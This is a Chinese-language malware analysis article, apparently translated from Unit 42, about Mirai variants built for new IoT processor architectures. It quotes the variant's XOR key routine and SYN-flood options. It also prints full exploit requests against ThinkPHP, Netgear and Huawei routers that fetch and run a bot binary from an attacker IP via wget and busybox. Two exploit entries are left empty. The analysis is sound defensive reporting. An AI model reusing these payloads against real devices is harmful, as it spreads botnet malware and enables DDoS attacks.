支持新处理器架构的Mirai变种出现

概述

2019年2月底，unit 42研究人员发现了新出现的为新处理器架构编译的Mirai样本。虽然Mirai的源码在2016年就公开了，但是它的攻击目标是特定的一批处理器架构集。

Unit 42研究人员发现了专为Altera Nios II, OpenRISC, Tensilica Xtensa和Xilinx MicroBlaze处理器的样本。这是Mirai第二次扩展新的处理器架构，上一次是2018年1月发现的攻击ARC CPU的样本。这说明Mirai的开发者还在不断更新技术，并攻击IOT设备。

本文主要介绍新发现的样本相关的基础设施，以及其他Mirai样本如何使用已知的漏洞利用等。

新样本的新特征

除了支持新的处理器架构外，研究人员还在新样本中发现了以下特征：

加密算法。新样本对原来Mirai代码中使用的标准字节XOR算法进行了修改。使用11个8字节的key，所有都使用字节级的XOR来获取最终的key，代码如下：

tablekeys = [0xdeadbeef, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF, 0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF]
xor_key = 0
for key in tablekeys:
xor_key ^= key&0xff ^ (key>>8 & 0xff) ^ (key>>16 & 0xfF) ^ (key>>24 & 0xff)

这相当于与0x5A进行字节级的XOR运算。

attack_method_ovh。样本中含有以下参数的DDOS攻击选项：

ATK_OPT_IP_TOS = 0
ATK_OPT_IP_IDENT = 0xFFFF
ATK_OPT_IP_TTL = 64
ATK_OPT_IP_DF = 1
ATK_OPT_SPORT = 0xFFFF
ATK_OPT_DPORT = 0xFFFF
ATK_OPT_SEQRND = 0xFFFF
ATK_OPT_ACKRND = 0
ATK_OPT_URG = 0
ATK_OPT_ACK = 0
ATK_OPT_PSH = 0
ATK_OPT_RST = 0
ATK_OPT_SYN = 1
ATK_OPT_FIN = 0
ATK_OPT_SOURCE = LOCAL_ADDR

这与原来Mirai源代码中的攻击方法“TCP SYN” (attack_method_tcpsyn)的参数是一样的，所以为什么要将相同的参数加入到一个新的攻击方法中呢？目前尚不清楚原因。据此，研究人员发现了从2018年11月开始就应用该方法的样本。

基础设施

研究人员在一个IP地址上发现了多个最新的样本，但2019年2月22日开始，该服务器将这些文件列表隐藏起来了，但是还为文件提供web服务。

图1. 保存Mirai变种代码的目录

在2月22日之前，该IP地址还提供含有以下漏洞利用的Mirai样本。这些漏洞利用都是在之前的Mirai样本中使用过的。研究人员根据这些漏洞利用推测这些变种应该是同一波攻击者在使用，漏洞利用如下：

·ThinkPHP远程代码执行漏洞

利用格式：

GET /to/thinkphp5.1.29/?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= ‘wget http://178.62.227[.]13/wrgjwrgjwrg246356356356/hx86 -O /tmp/Hito; chmod 777 /tmp/Hito; /tmp/Hito wget.exploit.selfrep.thinkphp’ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hito/2.0

· D-Link DSL2750B OS命令注入漏洞

利用格式：

· Netgear远程代码执行漏洞

利用格式：

GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;/bin/busybox+wget+-g+178.62.227[.]13+-l+/tmp/binary+-r+/wrgjwrgjwrg246356356356/hmips;+/bin/busybox+chmod 777+*+/tmp/binary;/tmp/binary+wget.selfrep.exploit.netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

· CVE-2014-8361

利用格式：

· CVE-2017-17215

利用格式：

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username=”dslf-config”, realm=”HuaweiHomeGateway”, nonce=”88645cefb1f9ede0e336e3569d75ee30″, uri=”/ctrlt/DeviceUpgrade_1″, response=”3612f843a42db38f48f59d2a3597e19c”, algorithm=”MD5″, qop=”auth”, nc=00000001, cnonce=”248d1a2560100669″
<?xml version=”1.0″ ?><s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:Upgrade xmlns:u=”urn:schemas-upnp-org:service:WANPPPConnection:1″><NewStatusURL>$(/bin/busybox wget -g 178.62.227.13 -l /tmp/binary -r /wrgjwrgjwrg246356356356/hmips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary wget.selfrep.exploit.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

总结

因为Mirai源代码是公开的，因此开源将源代码进行适应其他处理器的编译，以提供给攻击者更大的攻击面。这也说明该恶意软件家族会通过更多的嵌入式设备感染和传播，提供给攻击者更强大的DDOS攻击的能力。

研究人员建议企业和用户对IOT设备及时更新补丁，并不要使用默认口令。